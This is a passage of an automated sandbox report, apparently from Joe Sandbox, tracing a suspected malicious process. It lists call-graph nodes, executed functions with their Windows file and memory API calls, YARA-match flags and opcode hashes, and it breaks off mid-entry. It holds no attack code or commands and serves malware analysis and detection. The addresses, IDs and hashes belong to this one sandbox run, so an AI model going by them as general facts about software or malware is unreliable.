321d85c 101361->101359 101362 3224de0 GetFileAttributesW 101362->101363 101363->101361 101363->101362 101033 322c510 101034 322b410 RtlFreeHeap 101033->101034 101035 322c525 101034->101035 101364 32259d0 101365 3225a35 101364->101365 101366 3225a70 101365->101366 101369 3221340 101365->101369 101368 3225a52 101370 322132a 101369->101370 101371 3229300 NtClose 101370->101371 101372 32213f8 101370->101372 101373 322132f 101371->101373 101372->101368 101373->101368 101374 3228250 101375 322826a 101374->101375 101376 322827b RtlDosPathNameToNtPathName_U 101375->101376

                                                                Executed Functions

                                                                Function 0321C500 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 0321C5E4
                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 0321C61F
                                                                • FindClose.KERNELBASE(?), ref: 0321C62A
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$File$CloseFirstNext
                                                                • String ID:
                                                                • API String ID: 3541575487-0
                                                                • Opcode ID: 86011c127d856a0f2cf1489457390f07b8c344b9b3ec3ab41ca31718808f41b2
                                                                • Instruction ID: c08f5dd3a3953a581cf676f59443c7dc90d7ad1554ecd429bca3a472b835dba1
                                                                • Opcode Fuzzy Hash: 86011c127d856a0f2cf1489457390f07b8c344b9b3ec3ab41ca31718808f41b2
                                                                • Instruction Fuzzy Hash: 2731C6B99503597BDB20DF60CD85FEF77BC9F94704F144458BA08AB180D6B0AAD4CBA1
                                                                Function 03229000 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtCreateFile.NTDLL(?,?,?,?,?,?,FC8E4B7A,?,?,?,?), ref: 032290FE
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: 6c116602c3ce2a7586dbde19a51ad50e29691ae579f357658d5e73b24c415cbe
                                                                • Instruction ID: 179c17cf30c8077fbd000dfec30b612258d77959568996178df25710a794a959
                                                                • Opcode Fuzzy Hash: 6c116602c3ce2a7586dbde19a51ad50e29691ae579f357658d5e73b24c415cbe
                                                                • Instruction Fuzzy Hash: 6F31C2B5A11208AFDB14DF98D880EEEB7B9EF8C304F108219F919A7344D774A951CBA5
                                                                Function 03229170 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtReadFile.NTDLL(?,?,?,?,?,?,FC8E4B7A,?,?), ref: 03229253
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: 2825084812d6e97e4a90768c6b76eb88233662d4728ecb26d01c52c31c1abc37
                                                                • Instruction ID: 0dcadfdc8a90e3947b54bf415ab04cdfd0a6b6d559e15c44e6ee3ee5965c5253
                                                                • Opcode Fuzzy Hash: 2825084812d6e97e4a90768c6b76eb88233662d4728ecb26d01c52c31c1abc37
                                                                • Instruction Fuzzy Hash: 6B31D8B5A00208AFDB14DF98D880EEF77B9EF88314F104119F919A7240D774A951CBA4
                                                                Function 03229460 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtAllocateVirtualMemory.NTDLL(03211CCB,?,03227F3E,00000000,00000004,00003000,?,?,?,?,?,03227F3E,03211CCB,0322B3B1,03227F3E,56C03309), ref: 03229528
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateMemoryVirtual
                                                                • String ID:
                                                                • API String ID: 2167126740-0
                                                                • Opcode ID: b03ee4917efc09109f1d551df49a914dcd29543988b4e9671e209da27d2be6ba
                                                                • Instruction ID: fb2806dc04be0e575a57e2e88f04832f720883af4def96dce9764f412096ba25
                                                                • Opcode Fuzzy Hash: b03ee4917efc09109f1d551df49a914dcd29543988b4e9671e209da27d2be6ba
                                                                • Instruction Fuzzy Hash: C3212BB5A10209AFDB10DF98DC41EEF77B9EF88700F104209FD19AB240D774A951CBA1
                                                                Function 03229260 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteFile
                                                                • String ID:
                                                                • API String ID: 4033686569-0
                                                                • Opcode ID: 87a012ad8a58bfa591f051fcc329374b3f67c791c4c7b4710c4fbe4803f8a9ba
                                                                • Instruction ID: 428ec68ef87d69e17b38fcd984d346843173d2615b5e2397e2fde658520ddb11
                                                                • Opcode Fuzzy Hash: 87a012ad8a58bfa591f051fcc329374b3f67c791c4c7b4710c4fbe4803f8a9ba
                                                                • Instruction Fuzzy Hash: 3E11A075A103197ED720EBA8CC01FEB77ACEF84714F104149FA08AB280D7B5B95587A1
                                                                Function 03229300 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 03229334
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID:
                                                                • API String ID: 3535843008-0
                                                                • Opcode ID: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                                • Instruction ID: 26c66537ccc05658fd5c12215bba605a5c128d091ee3267880dd02357f96ebfa
                                                                • Opcode Fuzzy Hash: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                                • Instruction Fuzzy Hash: 8AE0463A610214BBE220EA59DC01F9BB7ACDFC5764F408419FA0CAB281C6B0B92186F0
                                                                Function 03934340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 7bb66d0a0516bffacfb8777c521f039f2937489c0ce0f29bc1526516f7ebfd2e
                                                                • Instruction ID: 00b697b3417dd74e0bf95109ca0d8c4ac07c7e1c85739c882d52e16923c875e0
                                                                • Opcode Fuzzy Hash: 7bb66d0a0516bffacfb8777c521f039f2937489c0ce0f29bc1526516f7ebfd2e
                                                                • Instruction Fuzzy Hash: 2490023160990412A140B1584898946404997E0301B55C011E0424554C8B558A565361
                                                                Function 03934650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 7b50d23ec37b803bab6d1cb2b1c919f29f1990e99ab645ec99b742f3654b5af0
                                                                • Instruction ID: 071c25e6e6e696cbf06b1d04839d0248360b4f19c6547838f646a8b066474913
                                                                • Opcode Fuzzy Hash: 7b50d23ec37b803bab6d1cb2b1c919f29f1990e99ab645ec99b742f3654b5af0
                                                                • Instruction Fuzzy Hash: 56900261605604425140B1584818806604997E1301395C115E0554560C875989559369
                                                                Function 03932BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 7f1265f7762a8640e4115958c170da7136f69ec2c72da680ee1a4fd091855bac
                                                                • Instruction ID: ab7194a2acf3d615906986d39479fd5b2bd464d25c01ec18b8f109d475a0fc58
                                                                • Opcode Fuzzy Hash: 7f1265f7762a8640e4115958c170da7136f69ec2c72da680ee1a4fd091855bac
                                                                • Instruction Fuzzy Hash: 0490023160950C02E150B1584428B46004987D0301F55C011E0024654D87968B5577A1
                                                                Function 03932BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 4420d02525bb0db2549474dba4861862b11ba1871de1b040611177db77df02f1
                                                                • Instruction ID: ba5173fb01be06699076b89bafdc9949885677a42d2b4041bef8ea93a2580b05
                                                                • Opcode Fuzzy Hash: 4420d02525bb0db2549474dba4861862b11ba1871de1b040611177db77df02f1
                                                                • Instruction Fuzzy Hash: 9F90023120550C02E180B1584418A4A004987D1301F95C015E0025654DCB568B5977A1
                                                                Function 03932BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 83f4e1a04f6439b8b2bc4a460a187d7495f599d857a082e002915a973309dedb
                                                                • Instruction ID: 09aa2b58da5100a06c4d0bbf31caf1d3b0347e05125ddf624cc974b40c8af49a
                                                                • Opcode Fuzzy Hash: 83f4e1a04f6439b8b2bc4a460a187d7495f599d857a082e002915a973309dedb
                                                                • Instruction Fuzzy Hash: 4790023120954C42E140B1584418E46005987D0305F55C011E0064694D97668E55B761
                                                                Function 03932B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 5a2c23c55a915dd84654e46c5295099c3c784df33b1f9848212a2cf3d124bcda
                                                                • Instruction ID: dce561f7d4a38ba3f7003e70b45de958e4bad780b40a988f708e06cf5a49f07a
                                                                • Opcode Fuzzy Hash: 5a2c23c55a915dd84654e46c5295099c3c784df33b1f9848212a2cf3d124bcda
                                                                • Instruction Fuzzy Hash: 9B900261206504035105B1584428A16404E87E0201B55C021E1014590DC66689916225
                                                                Function 03932AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 0d3ca7cc4d7a221818efc3d1e7ad6ac83bb23be625f12d4385aaaef426933f0f
                                                                • Instruction ID: b3d3959fe93c6281ae7fd06fcd410188bc34b19220ae16e50c6f03d21c61dd90
                                                                • Opcode Fuzzy Hash: 0d3ca7cc4d7a221818efc3d1e7ad6ac83bb23be625f12d4385aaaef426933f0f
                                                                • Instruction Fuzzy Hash: 3E900435315504031105F55C071CD0700CFC7D5351355C031F1015550CD773CD715331
                                                                Function 03932AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: ec4103d2ffb50869d56616056c88f092ffed69c3e60d4340e092b642bf76b185
                                                                • Instruction ID: e7d3dcbb9dff8109d5b77cb91799384e26efbbd368afc7e05df0448f0ea7e9eb
                                                                • Opcode Fuzzy Hash: ec4103d2ffb50869d56616056c88f092ffed69c3e60d4340e092b642bf76b185
                                                                • Instruction Fuzzy Hash: 18900225225504021145F558061890B048997D6351395C015F1416590CC76289655321
                                                                Function 03932FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: d6e91d72df567969fb4019d2f6bd222e6318f7e6303fdb322e0f9fa225833d5c
                                                                • Instruction ID: cac63d534eb0c682d7eb4e7c36e6e7945f2a5836108b3edad2808207d4f19c9a
                                                                • Opcode Fuzzy Hash: d6e91d72df567969fb4019d2f6bd222e6318f7e6303fdb322e0f9fa225833d5c
                                                                • Instruction Fuzzy Hash: E2900221605504425140B1688858D064049ABE1211755C121E0998550D869A89655765
                                                                Function 03932FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: f9c501990d9227faea1876de403d4bff6c6eac7d9888a545a5f4f903c3e0e25a
                                                                • Instruction ID: a7ffa00478660fcf416fe169745c48bb608cca0e8fcb500fe4bce194018ead2f
                                                                • Opcode Fuzzy Hash: f9c501990d9227faea1876de403d4bff6c6eac7d9888a545a5f4f903c3e0e25a
                                                                • Instruction Fuzzy Hash: 51900221215D0442E200B5684C28F07004987D0303F55C115E0154554CCA5689615621
                                                                Function 03932F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 0140accab26919e51ab74871588571aaba8f06517d0a5d075904224aad3c214c
                                                                • Instruction ID: 4634d928edb80c507da2a510888a7ad114c6b70419b4c4f8648e91ffa4c604de
                                                                • Opcode Fuzzy Hash: 0140accab26919e51ab74871588571aaba8f06517d0a5d075904224aad3c214c
                                                                • Instruction Fuzzy Hash: 2890026134550842E100B1584428F060049C7E1301F55C015E1064554D875ACD526226
                                                                Function 03932E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: e57bf31e10ec61be30f7f77dc7c56c86bb0391670d99a548b787459aac3addf6
                                                                • Instruction ID: d61c35260e4ae7ee59d24c7678558a597342336f498a9b763353f53ba785a562
                                                                • Opcode Fuzzy Hash: e57bf31e10ec61be30f7f77dc7c56c86bb0391670d99a548b787459aac3addf6
                                                                • Instruction Fuzzy Hash: 0590022160550902E101B1584418A16004E87D0241F95C022E1024555ECB668A92A231
                                                                Function 03932EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 683854739f4942c9a7649854fd63b0f773c8bcfbe52f74603b76d3e579306225
                                                                • Instruction ID: cdc359fb419f31ede06ec35bf55b977a984cd7dccc9e5fe65c82af83c17d1306
                                                                • Opcode Fuzzy Hash: 683854739f4942c9a7649854fd63b0f773c8bcfbe52f74603b76d3e579306225
                                                                • Instruction Fuzzy Hash: BF90026120590803E140B5584818A07004987D0302F55C011E2064555E8B6A8D516235
                                                                Function 03932DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 874af575acac4ff1cfb1def9994eabf892f794d1951ceecc5a88ba13d9dabfbb
                                                                • Instruction ID: 0049fd52dbc39495122bdf08b76650b3d3ffb2bb183a6f942458c708b0caaf84
                                                                • Opcode Fuzzy Hash: 874af575acac4ff1cfb1def9994eabf892f794d1951ceecc5a88ba13d9dabfbb
                                                                • Instruction Fuzzy Hash: 3F900221246545526545F1584418907404A97E0241795C012E1414950C86679956D721
                                                                Function 03932DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 9fafa3bb54f3afcad4669fae7921f99d842b2fd57ec2c5f11dd34981aa757ee0
                                                                • Instruction ID: d6a55aa4b4b60a4bc1483da3ac20d7fd618ceb2b2da3ba1e13018dcd360c9c6c
                                                                • Opcode Fuzzy Hash: 9fafa3bb54f3afcad4669fae7921f99d842b2fd57ec2c5f11dd34981aa757ee0
                                                                • Instruction Fuzzy Hash: 5890023120550813E111B1584518B07004D87D0241F95C412E0424558D97978A52A221
                                                                Function 03932D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: a55aa3ad573e70bf7b000743dee5e3f43f225b2a057704a4a2033758f71f1322
                                                                • Instruction ID: af1a02e22924812977476bb0c2aae43e28e92c2176a4e06d2af289e133af31e8
                                                                • Opcode Fuzzy Hash: a55aa3ad573e70bf7b000743dee5e3f43f225b2a057704a4a2033758f71f1322
                                                                • Instruction Fuzzy Hash: 7B90022921750402E180B158541CA0A004987D1202F95D415E0015558CCA5689695321
                                                                Function 03932D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 2566ab3e709deb8045b167a2560c5f2cf85c4ff1f333a3c5487036dbfde28b52
                                                                • Instruction ID: e3aff0bee90bf05031d8ad9230dc96257f8e499e2323c346cf2ed464f9a4023d
                                                                • Opcode Fuzzy Hash: 2566ab3e709deb8045b167a2560c5f2cf85c4ff1f333a3c5487036dbfde28b52
                                                                • Instruction Fuzzy Hash: 3690022130550403E140B158542CA064049D7E1301F55D011E0414554CDA5689565322
                                                                Function 03932CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
